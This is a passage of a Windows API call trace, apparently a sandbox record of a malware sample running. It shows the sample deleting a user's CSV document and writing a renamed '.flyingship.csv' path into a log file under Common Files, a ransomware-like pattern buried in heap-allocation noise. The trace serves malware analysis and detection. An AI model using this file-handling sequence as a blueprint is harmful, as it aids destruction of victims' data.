out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.558] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ob0cmu.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0178.559] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.559] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.559] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0178.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.559] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.560] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.560] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.560] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.561] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.561] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.561] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0178.561] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.561] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.561] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.561] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.561] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.561] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", lpFilePart=0x0) returned 0x42 [0178.562] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xfc1bd60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 0x90af58 [0178.563] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ob0cmu.csv")) returned 1 [0178.573] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xfc1bd60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 0 [0178.573] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.574] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.574] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.576] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.576] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0178.576] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.576] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.577] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0178.577] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x18ee, lpOverlapped=0x0) returned 1 [0178.577] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0178.577] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x18ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.578] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0178.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0178.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0178.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv\r\n", cchWideChar=80, lpMultiByteStr=0x923a78, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv\r\n", lpUsedDefaultChar=0x0) returned 80 [0178.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0178.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0178.578] WriteFile (in: hFile=0x120, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0178.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0178.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.578] CloseHandle (hObject=0x120) returned 1 [0178.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0178.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0178.683] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0178.683] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.684] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0178.684] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.684] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0178.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0178.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.684] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0178.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0178.685] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.687] 